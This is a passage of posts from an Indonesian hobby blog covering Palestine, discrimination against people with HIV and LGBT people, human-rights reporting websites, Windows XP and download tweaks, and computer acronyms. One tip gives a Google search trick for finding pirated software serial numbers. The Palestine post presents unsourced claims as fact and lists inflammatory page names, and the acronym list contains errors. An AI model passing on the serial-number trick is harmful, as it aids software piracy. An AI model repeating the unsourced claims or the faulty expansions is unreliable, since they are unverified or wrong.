  384. Dunia ini sebenarnya tidak buta, tetapi kenapa banyak orang yang membutakan hatinya seolah - olah tidak melihat kenyataan dan perbuatan yang dilakukan Israel
  385.  
  386. terhadap Palestina. Dunia seolah berpura - pura tidak mengetahui kebiadaban Israel. Betapa kejamnya Israel. Masyarakat dunia khususnya negara-negara Arab,
  387.  
  388. semula mereka memihak bangsa Palestina dan berperang dengan Israel untuk membela hak-hak bangsa Palestina yang telah dirampas oleh Israel, kenapa akhirnya
  389.  
  390. mereka angkat tangan dan berdiam diri membiarkan rakyat Palestina terus ditindas oleh Zionis - zionis Israel.
  391.  
  392. Apakah tidak ada kekuatan seseorang, lembaga atau negara yang bisa menekan Israel agar penderitaan Palestina bisa berkurang?.
  393.  
  394. Adakah sesuatu yang bisa menghentikan Israel?
  395.  
  396. Sepertinya hanya angan - angan saja bagi rakyat palestina untuk mendapatkan hak dan kebebasanya. Karena memang benar tidak ada suatu kekuatan yang bisa
  397.  
  398. menghentikan Israel, negara Amerika Serikat saja yang dikatakan negara paling digdaya di dunia pun tidak memiliki hak untuk ikut campur dalam konflik ini.
  399.  
  400. Bahkan Organisasi internasional Persatuan Bangsa Bangsa (PBB) pun yang di dalamnya terdapat kekuatan dari berbagai negara dan yang biasanya bertugas
  401.  
  402. mengadili pelanggaran - pelanggaran besar di dunia, juga tidak bisa berbuat apa - apa untuk membela palestina.
  403.  
  404.  
  405.  
  406.  
  407.  
  408.  
  409.  
  410.  
  411.  
  412.  
  413. Anak-anak, kaum wanita dan ribuan rakyat Palestina begitu merasakan penderitaan yang sangat mendalam akibat konflik ini. Ironisnya lagi, di kala rakyat
  414.  
  415. palestina menderita karena diborbardir serangan udara, laut dan darat, sebagian rakyat Israel malah menjadikannya tontonan paling menarik di layar TV karena
  416.  
  417. penyerangan Israel kepada palestina disiarkan secara langsung oleh pemerintah Israel. Mereka dengan bangga dan senangnya melihat heroisme tentara Israel dan
  418.  
  419. melihat mayat-mayat bergelimpangan, anak-anak terluka bersimbah darah dan menangis histeris menahan derita, dan ribuan lainnya kelaparan dan kedinginan.
  420.  
  421. Bahkan terdapat fakta yang menyatakan negara Israel adalah negara yang paling banyak melakukan pelanggaran Hak Asasi manusia di DUNIA sepanjang tahun 2007.
  422.  
  423. Berbagai pelanggaran mereka perbuat diantaranya membunuh anak - anak, wanita dan rakyat yang tidak terlibat perang, membunuh wartawan, melecehkan, merebut
  424.  
  425. tanah milik Palestina, menghancurkan kapal - kapal bantuan yang menuju Palestina dan melanggar syarat - syarat perang lainya. Bahkan ada informasi yang
  426.  
  427. mengatakan bahwa sasaran utama para tentara israel adalah anak - anak palestina, dengan memusnahkan anak - anak palestina secara tidak langsung perlahan -
  428.  
  429. lahan akan membuat bangsa palestina hancur, sehingga israel merasa berhak mengklaim tanah palestina sepenuhnya. Sungguh biadab!!!.
  430.  
  431. Tidak ada kekuatan lagi yang dapat menghentikan israel selain kita semua bersatu untuk menghentikanya. Maka dari itu saya mengajak teman - teman semua terutama para facebookers untuk meluangkan sedikit waktunya untuk mendukung gerakan - gerakan yang berusaha menghentikan konflik ini dan mengadili Israel seAdil - adilnya. Teman - teman bisa mendukung gerakan untuk palestina melalui fanpages di bawah ini dengan dua klik saja, Klik link daftar link di bawah ini dan klik Like atau Suka.
  432.  
  433. Free palestina
  434.  
  435. Gerakan 100 juta facebookers tolak intimidasi terhadap palestina
  436.  
  437. FACEBOOKER DUKUNG NEGARA KIRIM TENTARA UNTUK BEBASKAN PALESTINA
  438.  
  439. SAVE PALESTINA BOYCOTT ISRAEL  
  440.  
  441. Semua orang indonesia dukung Palestina
  442.  
  443. Gerakan 1000000000 Facebookers KECAM SRAEL
  444.  
  445. Gerakan 1000000 Facebookers-Boikot Produk Israel
  446.  
  447. gerakan-facebookers mendukung kemerdekaan palestine ANTI-ISRAEL  
  448.  
  449. GERAKAN 1000000 FACEBOOKERS KUTUK ISRAEL
  450.  
  451. GERAKAN BUMI HANGUSKAN ISRAEL DARI PETA DUNIA
  452.  
  453. dukung palestina untuk melawan zionis israel
  454.  
  455. Itu saja temen - temen semoga tercipta keadilan yang seAdil - adilnya di Palestina, Oh ya jangan lupa di suggest ke teman lainya ya biar lebih afdol ibadahnya.
  456. original from : http://www.the-cybers-skills.blogspot.com
  457. Diskriminasi Terhadap Kaum Minoritas (ODHA dan LGBT)
  458. Saturday, April 23, 2011 10:04 PM
  459. Salam cybers!. Membicarakan tentang pelanggaran Hak Asasi Manusia di Indonesia memang tak ada habis – habisnya, satu kasus belum selesai muncul lagi kasus – kasus baru yang tak kalah heboh. Salah satu jenis pelanggaran HAM yang selalu ada dan tak kunjung selesai adalah Diskriminasi terhadap kaum – kaum minoritas. Apa itu deskriminasi? OK, lets begun!!
  460.  
  461. Deskriminasi adalah suatu pelayanan atau perlakuan yang tidak adil (sama) terhadap individu atau kelompok tertentu, dimana aturan dari pelayanan atau perlakuan tersebut dibuat berdasarkan karakteristik yang diwakili oleh individu atau kelompok tersebut. Diskriminasi juga dimaksud dengan pembatasan, penolakan, pengucilan, pelecehan, penyimpangan atau pengurangan penggunaan HAM dan kebebasan dasar dalam lingkungan masyarakat oleh kelompok mayoritas di lingkungan tersebut.
  462.  
  463. Diskriminasi merupakan kejadian yang biasa dijumpai di lingkungan masyarakat, ini disebabkan karena kecenderungan manusia untuk membeda – bedakan yang lainya. Ketidaksamaan pemikiran, ketidaksetaraan kasta / ras / golongan, kesenjangan sosial, suku, ekonomi, kepercayaan, agama, kondisi fisik dan gender (jenis kelamin) menjadi alasan dasar seseorang individu atau kelompok di beda – bedakan perlakuanya di lingkungan masyarakat.
  464.  
  465. Dalam hal ini seorang ODHA (Orang Dengan HIV dan AIDS) dan LGBT (Lesbian, Gay, Bisexual dan Transgender) paling banyak mengalami tindakan diskriminatif tersebut. Mereka di diskriminasi  karena mereka dianggap orang yang memiliki moralitas kurang, mereka dianggap tidak bermoral atau berperilaku menyimpang sehingga masyarakat  bersikap diskriminatif kepada mereka dengan alasan sebagai judgement (hukuman) mereka juga dikira berbahaya bagi masyarakat sehingga harus di jauhi.
  466.  
  467. Orang Dengan HIV / AIDS (ODHA) masih selalu menjadi subyek yang dianggap membahayakan bagi lingkungan masyarakat. Bermacam – macam pandangan buruk yang ada pada kelompok / individu ini membuat mereka dikucilkan dan mendapat perlakuan yang tidak sama dengan yang lainya oleh masyarakat sekitar. Sikap underestimate masyarakat sekitar terhadap individu / kelompok minoritas tersebut membuat mereka semakin jauh dari keadilan, tidak dihargai dan tidak diberikan haknya sebagai mahkluk sosial seperti yang lainya. Seharusnya mereka mendapat perlakuan yang sama dengan yang lain karena mereka juga manusia biasa yang memiliki hak untuk itu. Tidak adanya perlindungan terhadap kelompok minoritas tersebut juga semakin membuat mereka tersingkir dari kehidupan bermasyarakat.
  468.  
  469. Pelanggaran Hak Asasi Manusia yang diperoleh ODHA dan LGBT pun terjadi di hampir seluruh aspek, baik politik, ekonomi, sosial dan budaya. Di setiap lingkup ODHA dan LGBT tidak sepenuhnya memiliki hak dan perlindungan yang sama dengan masyarakat dominan, hak untuk hidup, berkehidupan layak, bekerja bahkan bersosialisasi dengan masyarakat karena apa yang mereka lakukan tidak diakui dalam sistem hukum negara sebagai tindakan yang legal dan dianggap bertentangan dengan perilaku masyarakat dominan. Bahkan dalam banyak situasi kehadiran mereka dipandang sebagai ancaman dan gangguan terhadap ketertiban umum. Kaum waria misalnya, mereka merupakan bagian dari masyarakat tersisih yang dilupakan kehadiranya, baik oleh masyarakat maupun negara. Mereka ada sebagai warga negara yang sah, namun dalam kehidupan sehari – hari mereka mengalami diskriminasi yang berlapis – lapis. Mulai dari pengucilan oleh lingkunagn keluarga, dihinakan di lingkungan pendidikan, dikeluarkan dari lingkungan pekerjaan, perbedaan pelayanan oleh aparat pemerintahan, hingga tindakan – tindakan pelecehan yang dilakukan aparat negara maupun masyarakat di lingkungan sekitar dimana mereka berada. Meski ada banyak diantara mereka yang berpendidikan tinggi, bergelar sarjana,  pada umumnya kalangan waria hanya berserak sebagai bagian dari kehidupan jalanan. Tidak cukup pilihan pekerjaan bagi mereka karena mereka juga di kucilkan di lingkungan pekerjaan,  untuk menopang kehidupan mereka hanya ada pilihan yaitu di jalanan, dunia hiburan, kecantikan atau fashion. Di level yang lebih rendah banyak diantara mereka yang terpaksa bekerja berparuh waktu di salon siang hari atau menjadi pengamen, sementara di malam hari sebagai penghibur dan pekerja seks. Bahkan di dunia pekerjaan yang pilihanya sangat sedikit tersebut mereka masih banyak menerima perlakuan – perlakuan yang melanggar hak asasi manusia, mereka tidak dihargai mereka dipukul, ditampar, diludahi dan dilecehkan.
  470.  
  471. Biasanya seseorang ODHA dan LGBT mengalami penolakan dari keluarga atau masyarakat setelah mereka mengaku atau ketahuan sebagai ODHA atau LGBT. Tindakan buruk  yang dilakukan keluarga atau masyarakat dapat berupa ancaman untuk menyembunyikan orientasi seksualnya, membatasi pergaulan, memaksanya untuk melakukan sesuatu, penolakan, ataupun pengusiran. Tetapi jika diamati lebih jauh mereka memperoleh perlakuan itu karena banyak masyarakat yang pengetahuanya masih minim terhadap kelompok tersebut.
  472.  
  473. Kampanye tentang bahaya HIV / AIDS bukanlah hanya seremonial semata yang diperingati setiap tanggal 1 Desember, ini adalah masalah kesadaran kita bersama. Tiap hari masih ada banyak orang yang terkena HIV / AIDS. Jadi pembangunan kesadaran itu harus lebih sering dilakukan, dan masyarakat harus mengakui keberadaan LGBT dan menerimanya sebagai salah satu bagian dari kelompok masyarakat yang heterogen. Dengan tidak dikucilkan dan diperlakukan sama dengan yang lainya, maka masyarakat akan sedikit demi sedikit mengerti , dan mereka pun (LGBT dan ODHA) akan dengan mudah diterima di lingkungan masyarakat manapun terutama di lingkungan pekerjaan. Dengan itu akan banyak tercipta lapangan pekerjaan bagi mereka sehingga mereka tidak harus menjadi bagian dari pekerjaan yang tidak layak (pekerja seks), setelah hal tersebut tercapai maka para pengidap HIV / AIDS (ODHA) akan berkurang dan bahkan tidak ada seseorang pun yang harus menjadi ODHA.
  474.  
  475. Banyak orang merasa bahwa LGBT dan ODHA adalah menjijikan, banyak orang beranggapan bahwa jika mereka dekat - dekat dengan ODHA mereka akan tertular, banyak pula orang yang sudah mengetahui cara - cara penularan HIV / AIDS, tapi mereka malah lebih suka dekat - dekat dengan perilaku yang menyebabkan mereka terjangkit oleh penyakit ini, bukan orang yang mengidap penyakit ini.
  476.  
  477. JAUHI PENYAKITNYA, BUKAN PENGIDAPNYA!!!.
  478. original from : http://www.the-cybers-skills.blogspot.com
  479. Website Untuk Mengadu atau Melapor Pelanggaran HAM
  480. Thursday, November 25, 2010 10:51 PM
  481. Salam cybers!. Setelah kemarin aku menulis tentang teknologi informasi dan Hak asasi manusia, kali ini aku mau memberi referensi kepada teman - teman tentang Situs atau Website untuk mengadu atau melapor pelanggaran HAM secara online.Atau hanya ingin mencari informasi mengenai Hak Asasi manusia.
  482. Berikut adalah daftar beberapa website HAM
  483.  
  484. Komisi Nasional Hak Asasi Manusia. Dalam situs ini ada banyak informasi tentang HAM, berita terkini tentang penyelidikan kasus pelanggaran HAM, dan kamu juga bisa mengadu atau melapor pelanggaran HAM secara online di situs ini.  http://www.komnasham.go.id/
  485.  
  486.  
  487.    *  Departemen Hukum Dan Hak Asasi Manusia. di situs ini terdapat aturan - aturan, UU, dan Informasi yang berhubungan dengan HAM bisa juga kamu mengadu secara online di sini. http://www.depkumham.go.id/
  488.  
  489.  
  490.  
  491.    *  Komisi Nasional Anti Kekerasan Terhadap Perempuan. Dalam situs ini ada berbagai informasi tentang HAM dan kasus - kasus tentang pelanggaran HAM perempuan. Bila kamu seorang perempuan dan ada masalah tentang HAM bisa lapor atau mengadu di sini. http://www.komnasperempuan.or.id/
  492.  
  493.  
  494.  
  495.    *  Yayasan Lembaga Bantuan Hukum Indonesia. Situs yang mempunyai tujuan untuk membantu masyarakat untuk mendapatkan keadilan di muka hukum, juga tersedia informasi - informasi tentang hukum dan Hak asasi manusia. http://www.ylbhi.or.id/
  496.  
  497.  
  498.  
  499.    *  Komisi Perlindungan Anak Indonesia. Di situs ini ada banyak sekali informasi tentang Hak asasi manusia terhadap anak seperti kekerasan terhadap anak dll. http://www.kpai.go.id/
  500.  
  501.  
  502.  
  503.    *  Polisi Republik Indonesia. Di situs ini ada banyak sekali informasi tentang tindakan kriminal dan penyelidikan hukum, di situs ini kamu bisa melapor tindakan kriminal apapun bahkan pelanggaran Hak asasi manusia. http://www.polri.go.id/
  504.  
  505.  
  506.  
  507.    *  Direktorat Jenderal Perlindungan Hak asasi manusia. Di situs ini sangat lengkap, ada informasi tentang HAM, kasus - kasus pelanggaran HAM, Undang - undang Hak asasi manusia dan tempat untuk melapor atau mengadu pelanggaran HAM. http://www.ham.go.id/
  508.  
  509.  
  510.  
  511.    *  Komisi Hukum Nasional. Di situs ini berisi berita, informasi hukum, informasi HAM dan ada diskusi publik tentang hukum. http://www.komisihukum.go.id/
  512.  
  513.  
  514.  
  515.    *  Kementerian Hukum Dan Hak asasi manusia. Di situs ini ada banyak informasi mengenai perkara hukum dan HAM. http://www.kemenkumham.go.id/
  516.  
  517.    * Direktorat Jenderal Hak Kekayaan Intelektual (Kementerian Hukum dan Hak Asasi Manusia). Di situs ini ada berita dan informasi tentang HAM, ada forum diskusi dan ada konsultasi tentang HAM. http://www.dgip.go.id/
  518.  
  519.  
  520.  
  521.    *  Lembaga Studi dan Advokasi Masyarakat. Di situs ini kamu akan menemukan berita - berita tentang HAM dan ada klinik konsultasi mengenai HAM. Kamu juga bisa mengadu disini. http://www.elsam.or.id/
  522.  
  523.  
  524.  
  525.    *  Imparsial Indonesian Human Rights Monitor. Situs yang bergerak untuk mengawasi dan menyelidiki pelanggaran Hak asasi manusia di indonesia. Berisi berita - berita mengenai pelanggaran HAM di Indonesia. Kamu juga bisa mengadu di sini. http://www.imparsial.org/
  526.  
  527.  
  528.  
  529.    *  VHRmedia. Di situs ini ada banyak informasi atau berita tentang pelanggaran HAM dan kamu juga bisa berdiskusi tentang Hak asasi manusia. Kalau kamu ada masalah mengenai HAM situs ini tepat untuk bertanya. http://www.vhrmedia.com/
  530.  
  531.  
  532.  
  533.    *  Lembaga Kajian Demokrasi dan Hak asasi manusia (Demos Indonesia). Di situs ini ada banyak artikel - artikel atau berita mengenai HAM. Jika kamu mengalami pelanggaran HAM (hak kamu dilanggar) dan kamu butuh dukungan untuk menuju keadilan situs ini sangat tepat untuk referensi. http://www.demosindonesia.org/
  534.  
  535.  
  536.  
  537.    * Departemen kehakiman dan Hak asasi manusia. http://www.depkehham.go.id/
  538.  
  539.  
  540. Ada juga website HAM di luar Indonesia (International). Situs tersebut mungkin untuk menyelesaikan persoalan HAM yang besar atau rumit, atau juga untuk warga negara indonesia yang ada di luar indonesia. Juga bisa untuk referensi kita.
  541. Berikut sedikit dari banyaknya website organisasi International yang bergerak di bidang HAM
  542.  
  543.    *  United for Human Rights. http://www.humanrights.com/
  544.  
  545.  
  546.  
  547.    *  United Nation >> The Universal Declaration of Human Rights. http://www.un.org/en/rights/
  548.  
  549.  
  550.  
  551.    *  Amnesty International. http://www.amnesty.org/
  552.  
  553.  
  554.  
  555.    *  International Court of Justice. http://www.icj-cij.org/
  556.  
  557.  
  558.  
  559.    *  International Criminal Court Home Page. http://www.un.org/law/icc/
  560.  
  561.  
  562.  
  563.    *  United Nations Centre for Human Settlements. http://www.unchs.org/
  564.  
  565.  
  566.  
  567.    *  United Nations >> Conference of Plenipotentiaries on the Establishment of an International Criminal Court. http://www.un.org/icc/
  568.  
  569.  
  570.  
  571.    *  International Committee of the Red Cross. http://www.icrc.org/eng/
  572.  
  573.  
  574.  
  575.    *  Information and documents on humanitarian law-Derechos Human Rights. http://www.derechos.org/
  576.  
  577.  
  578.  
  579.    *  Human Rights Watch. http://www.hrw.org/
  580.  
  581.  
  582.  
  583.    *  World Organization Against Torture. http://www.omct.org/
  584.  
  585.  
  586.  
  587.    *  International Federation of Human Rights. http://www.fidh.imaginet.fr/
  588.  
  589.  
  590.  
  591.    *  Human Rights Web. http://www.hrweb.org/
  592.  
  593.  
  594. Semoga bermanfaat...
  595. original from : http://www.the-cybers-skills.blogspot.com
  596. Antara Hak Asasi Manusia Dan Teknologi Informasi
  597. Thursday, November 25, 2010 10:38 PM
  598. Salam cybers!. Pada waktu - waktu sebelumnya biasanya blog ini membahas mengenai komputer dan internet,tentunya teknologi. Tapi kali ini tak apalah aku mau nambahin sedikit informasi tentang HAM (Hak Asasi Manusia) dan kaitanya dengan Teknologi Informasi (IT).
  599.  
  600. HAK ASASI MANUSIA, Kalau menurutku Hak asasi manusia itu adalah hak dasar yang dimiliki seseorang sejak dia masih dalam kandungan. Hak asasi manusia bisa dikatakan sebagai hak - hak yang melekat pada setiap manusia dan tidak ada seseorang atau kekuasaan apapun yang bisa menganggu atau merebut hak tersebut. Hak ini dimiliki oleh setiap manusia, bukan karena pemberian dari seseorang,masyarakat atau pemerintahan melainkan pemberian dari sang penciptanya, yaitu Tuhan. Hak ini dibutuhkan oleh setiap orang untuk melindungi dirinya dalam bersosialisasi dengan sesama manusia lainya.
  601.  
  602. Meskipun Hak asasi manusia bersifat global / universal, artinya setiap orang memiliki hak tersebut tetapi meskipun seperti itu bukan berarti dengan hak - hak tersebut seseorang dapat berbuat sewenang - wenang sesuai keinginanya terhadap orang lain. Karena, apabila seseorang melakukan sesuatu pebuatan yang digolongkan sebagai perilaku yang melanggar hak asasi orang lain, maka seseorang tersebut harus bertanggung jawab atas perbuatan yang dilakukanya di mata hukum yang berlaku.
  603.  
  604. Pada dasarnya Hak asasi manusia terdiri dari dua hak dasar yang paling umum, yaitu hak Persamaan yang berarti setiap manusia itu sama atau sejajar dan yang kedua ialah hak Kebebasan. Dari kedua hak dasar tersebut muncul beberapa hak yang bersifat khusus atau spesifik. Diantaranya ada Hak untuk hidup, hak keamanan seseorang, hak untuk mencari perlindungan, hak atas pendidikan, hak untuk mendapatkan pekerjaan dan masih banyak yang lainya. Termasuk aku nulis dan mem-posting tulisan di blog ini dan kamu membacanya ada hak asasinya.
  605.  
  606. OK, lalu apa kaitanya antara HAM dengan IT?. Sebelum sampai ke situ sebaiknya kita mengetahui apa itu IT (teknologi informasi) terlebih dahulu.
  607.  
  608. TEKNOLOGI INFORMASI (IT) atau dalam masyarakat luas menyebutnya dengan Information technology, adalah suatu perkembangan ilmu pengetahuan atau inovasi tentunya di bidang informasi yang perkembanganya semakin lama akan semakin memudahkan umat manusia untuk saling bertukar informasi atau saling melengkapi informasi satu sama lain. Dan hal ini tentunya akan sangat mendukung terjadinya komunikasi yang baik antara sesama pengguna teknologi tersebut.
  609.  
  610. Dalam hal ini Internet sangat berperan penting dalam perkembangan teknologi informasi (IT). Dengan internet kita bisa mencari informasi apapun yang kita inginkan dengan cepat dan mudah. Internet mulai ada di Indonesia pada awal tahun 1990-an, pada saat itu internet hanya digunakan oleh orang atau instansi tertentu, terutama di bidang bisnis dan pendidikan saja. Namun seiring perkembangan teknologi, internet mulai dikenal di masyarakat luas dengan diperkenalkannya internet di dunia pendidikan.
  611.  
  612. Berdasarkan data dari Asosiasi Penyelenggara Jasa Internet Indonesia (APJII), jumlah pengguna internet di Indonesia pada tahun 1999 hanya ada sekitar 1 juta pengguna. Tetapi setelah 3 tahun kemudian pada tahun 2002 pengguna internet di indonesia mencapai 5 juta pengguna. Dan pada tahun 2006 pengguna internet di indonesia meningkat drastis, tercatat banyaknya pengguna internet di Indonesia sekitar 16 juta pengguna. Dan sampai sekarang ini pada tahun 2010 jumlah pengguna Internet di Indonesia ada lebih dari 26 juta pengguna. Woww!!, Dan pastinya akan terus bertambah seiring berkembangnya teknologi di bidang informasi.
  613.  
  614. Nah, menanggapi hal tersebut banyak para aktivis HAM berpikir bahwa internet dapat membantu mereka dalam berkomunikasi dan bertukar informasi satu sama lain, sehingga dapat mempermudah mereka untuk saling terhubung. Dari pemikiran ini jelas dapat mendukung usahanya dalam memajukan dan menegakan Hak asasi manusia. Dengan internet seseorang dapat dengan bebas berpendapat dan berekspresi mengenai masalah Hak asasi manusia, dan pengguna internet lain pun dapat dengan bebas menanggapi / merespon hal tersebut, sehingga mereka dapat berdiskusi tentang masalah yang sedang di alami untuk dicari jalan keluarnya secara bersama-sama.
  615.  
  616. Banyak cara untuk memperjuangkan HAM melalui IT diantaranya,Bisa lewat website atau blog. Banyak pengguna internet terutama para bloger, berusaha untuk mengerakan para pengguna internet untuk beraksi merespon isu atau masalah yang berhubungan dengan hak asasi manusia. Dengan mereka mem-posting artikel,berita terkini atau pengetahuan tentang hak asasi manusia di blog atau website mereka, maka akan memberikan suatu pengetahuan atau ilmu baru bagi para pengunjung blog atau website mereka. Dengan banyaknya orang yang mengerti apa itu hak asasi manusia dan apa akibat bila melnggarnya, maka otomatis pelanggaran hak asasi manusia akan berkurang.
  617.  
  618. Bisa lewat komunitas atau forum diskusi di internet, hak asasi manusia akan lebih mudah untuk diperjuangkan melalui cara ini karena cara ini sangat efektif untuk memecahkan permasalahan yang dihadapi bersama. Di dalam komunitas atau forum ini pengguna internet dapat leluasa berpendapat dan berekspresi menanggapi pendapat satu sama lain.
  619.  
  620. Atau juga bisa lewat situs - situs jejaring sosial yang sekarang ini sedang tren, Cara ini menurutku paling efektif untuk memperjuangkan HAM melalui it. karena seiring dengan banyaknya pemakai situs jejaring sosial seperti Facebook,Twitter,MySpace dll, para aktivis HAM dapat memperoleh banyak dukungan dari para pemakai situs - situs tersebut. Cara ini tidak begitu berbeda dengan cara kedua intinya adalah mengajak para pengguna internet untuk berpendapat dan mengajak para pengguna internet lain untuk turut berpartisipasi.Cara kerja dari cara ini biasanya ialah seperti sistem demokrasi yaitu mengajak masa sebanyak - banyaknya untuk mendukung tujuan dari forum/grup tersebut lalu di ajukan ke lembaga pemerintah untuk di pertimbangkan.
  621.  
  622. Bisa juga lewat situs - situs resmi pemerintah atau lembaga - lembaga penegak Hak asasi manusia yang sudah banyak tersedia di internet. Kita bisa memberikan informasi alamat situs tersebut kepada pengguna internet agar mereka mempunyai referensi untuk mencari apa yang mereka butuhkan. Di situs tersebut kita bisa kita menemukan banyak informasi mengenai HAM dan kita bisa melapor atau mengadu tentang pelanggaran HAM yang sedang terjadi secara online.
  623.  
  624. OK. Walaupun sudah ada pesawat yang sangat cepat sekali di dunia tapi kalah cepat dari internet, benar bukan?. Jadi intinya internet adalah teknologi informasi yang sekarang ini paling mendukung untuk memperjuangkan Hak asasi manusia melalui teknologi informasi.
  625.  
  626. Bila kamu pikir artikel ini membantu penegakan HAM di Indonesia, silahkan sebarkan artikel ini.  Kamu bebas men-Copy sebagian atau seluruh artikel ini asalkan mencantumkan sumber yaitu: http://www.cyberskills.co.cc/
  627. original from : http://www.the-cybers-skills.blogspot.com
  628. cara mempercepat proses booting Windows XP
  629. Saturday, December 04, 2010 6:37 PM
  630. Ikuti langkah-langkah berikut
  631.  
  632. 1. Buka notepad.exe, ketik "del c:\windows\prefetch\ntosboot-*.* /q" (tanpa tanda petik) dan  save as dengan nama "ntosboot.bat" di c:\.....
  633.  
  634. 2. Klik start, klik "Run..." dan ketik "gpedit.msc".
  635.  
  636. 3. Double klik "Windows Setting" dibawah "Computer Configuration" lalu klik "Scripts (Startup/Shutdown)" lalu double klik "Shutdown di sebelah kanan.
  637.  
  638. 4. Pada jendela baru klik "add", "Browse" lokasi file "ntosboot.bat" kamu, dan klik "Open".
  639.  
  640. 5. Klik "OK", "Aplly" dan "OK" sekali lagi untuk keluar.
  641.  
  642. 6. Dari start menu, klik "Run..." dan ketik "devmgmt.msc" (device manager).
  643.  
  644. 7. Double klik pada "IDE ATA/ATAPI controllers"
  645.  
  646. 8. Klik kanan "Primary IDE Channel" dan pilih "Properties".
  647.  
  648. 9. Pilih tab "Advanced Setting" kemudian pada "device 0" atau "1" bila tidak mempunyai "device type" (abu-abu) pilih none pada "autodetect" dan klik "OK".
  649.  
  650. 10. Klik kanan pada "Secondary IDE channel",Pilih "properties" dan ulangi langkah ke 9.
  651.  
  652. 11. Restart komputer kamu.
  653.  
  654. pasti ada bedanya
  655. original from : http://www.the-cybers-skills.blogspot.com
  656. Cara cepat mencari serial number di google
  657. Saturday, December 04, 2010 6:47 PM
  658. * Buka http://www.google.com
  659. * Pada kotak pencarian ketik: "nama software" 94FBR
  660. contoh "Photoshop 7" 94FBR
  661. bagaimana bisa? gw gak tau cek aja sendiri dan liat hasilnya.
  662. original from : http://www.the-cybers-skills.blogspot.com
  663. Cara mempercepat download
  664. Saturday, December 04, 2010 6:45 PM
  665. Pertama download software TCPOptimizer.exe ini linknya
  666. http://www.speedguide.net/files/TCPOptimizer.exe
  667.  
  668. lalu jalankan programnya, pergi ke settings pilih jenis koneksi yang kamu gunakan.
  669. pergi ke MaxMTU dan ubah menjadi 1500 ini sudah optimal.
  670.  
  671. Enjoy the speed!!
  672. original from : http://www.the-cybers-skills.blogspot.com
  673. Singkatan - singkatan dalam komputer
  674. Saturday, December 04, 2010 6:48 PM
  675. ADSL - Asymmetric Digital Subscriber Line
  676. AGP - Accelerated Graphics Port
  677. ALI - Acer Labs, Incorporated
  678. ALU - Arithmetic Logic Unit
  679. AMD - Advanced Micro Devices
  680. APC - American Power Conversion
  681. ASCII - American Standard Code for Information Interchange
  682. ASIC - Application Specific Integrated Circuit
  683. ASPI - Advanced SCSI Programming Interface
  684. AT - Advanced Technology
  685. ATI - ATI Technologies Inc.
  686. ATX - Advanced Technology Extended
  687.  
  688. --- B ---
  689. BFG - BFG Technologies
  690. BIOS - Basic Input Output System
  691. BNC - Barrel Nut Connector
  692.  
  693. --- C ---
  694. CAS - Column Address Signal
  695. CD - Compact Disk
  696. CDR - Compact Disk Recorder
  697. CDRW - Compact Disk Re-Writer
  698. CD-ROM - Compact Disk - Read Only Memory
  699. CFM - Cubic Feet per Minute (ft�/min)
  700. CMOS - Complementary Metal Oxide Semiconductor
  701. CPU - Central Processing Unit
  702. CTX - CTX Technology Corporation (Commited to Excellence)
  703.  
  704. --- D ---
  705.  
  706. DDR - Double Data Rate
  707. DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
  708. DFI - DFI Inc. (Design for Innovation)
  709. DIMM - Dual Inline Memory Module
  710. DRAM - Dynamic Random Access Memory
  711. DPI - Dots Per Inch
  712. DSL - See ASDL
  713. DVD - Digital Versatile Disc
  714. DVD-RAM - Digital Versatile Disk - Random Access Memory
  715.  
  716. --- E ---
  717. ECC - Error Correction Code
  718. ECS - Elitegroup Computer Systems
  719. EDO - Extended Data Out
  720. EEPROM - Electrically Erasable Programmable Read-Only Memory
  721. EPROM - Erasable Programmable Read-Only Memory
  722. EVGA - EVGA Corporation
  723.  
  724. --- F ---
  725. FC-PGA - Flip Chip Pin Grid Array
  726. FDC - Floppy Disk Controller
  727. FDD - Floppy Disk Drive
  728. FPS - Frame Per Second
  729. FPU - Floating Point Unit
  730. FSAA - Full Screen Anti-Aliasing
  731. FS - For Sale
  732. FSB - Front Side Bus
  733.  
  734. --- G ---
  735. GB - Gigabytes
  736. GBps - Gigabytes per second or Gigabits per second
  737. GDI - Graphical Device Interface
  738. GHz - GigaHertz
  739.  
  740. --- H ---
  741. HDD - Hard Disk Drive
  742. HIS - Hightech Information System Limited
  743. HP - Hewlett-Packard Development Company
  744. HSF - Heatsink-Fan
  745.  
  746. --- I ---
  747. IBM - International Business Machines Corporation
  748. IC - Integrated Circuit
  749. IDE - Integrated Drive Electronics
  750. IFS- Item for Sale
  751. IRQ - Interrupt Request
  752. ISA - Industry Standard Architecture
  753. ISO - International Standards Organization
  754.  
  755. --- J ---
  756. JBL - JBL (Jame B. Lansing) Speakers
  757. JVC - JVC Company of America
  758.  
  759. - K ---
  760. Kbps - Kilobits Per Second
  761. KBps - KiloBytes per second
  762.  
  763. --- L ---
  764. LG - LG Electronics
  765. LAN - Local Area Network
  766. LCD - Liquid Crystal Display
  767. LDT - Lightning Data Transport
  768. LED - Light Emitting Diode
  769.  
  770. --- M ---
  771. MAC - Media Access Control
  772. MB � MotherBoard or Megabyte
  773. MBps - Megabytes Per Second
  774. Mbps - Megabits Per Second or Megabits Per Second
  775. MHz - MegaHertz
  776. MIPS - Million Instructions Per Second
  777. MMX - Multi-Media Extensions
  778. MSI - Micro Star International
  779.  
  780. --- N ---
  781. NAS - Network Attached Storage
  782. NAT - Network Address Translation
  783. NEC - NEC Corporation
  784. NIC - Network Interface Card
  785.  
  786. --- O ---
  787. OC - Overclock (Over Clock)
  788. OCZ - OCZ Technology
  789. OEM - Original Equipment Manufacturer
  790.  
  791. --- P ---
  792. PC - Personal Computer
  793. PCB - Printed Circuit Board
  794. PCI - Peripheral Component Interconnect
  795. PDA - Personal Digital Assistant
  796. PCMCIA - Peripheral Component Microchannel Interconnect Architecture
  797. PGA - Professional Graphics Array
  798. PLD - Programmable Logic Device
  799. PM - Private Message / Private Messaging
  800. PnP - Plug 'n Play
  801. PNY - PNY Technology
  802. POST - Power On Self Test
  803. PPPoA - Point-to-Point Protocol over ATM
  804. PPPoE - Point-to-Point Protocol over Ethernet
  805. PQI - PQI Corporation
  806. PSU - Power Supply Unit
  807.  
  808. --- R ---
  809. RAID - Redundant Array of Inexpensive Disks
  810. RAM - Random Access Memory
  811. RAMDAC - Random Access Memory Digital Analog Convertor
  812. RDRAM - Rambus Dynamic Random Access Memory
  813. ROM - Read Only Memory
  814. RPM - Revolutions Per Minute
  815.  
  816. --- S ---
  817. SASID - Self-scanned Amorphous Silicon Integrated Display
  818. SCA - SCSI Configured Automatically
  819. SCSI - Small Computer System Interface
  820. SDRAM - Synchronous Dynamic Random Access Memory
  821. SECC - Single Edge Contact Connector
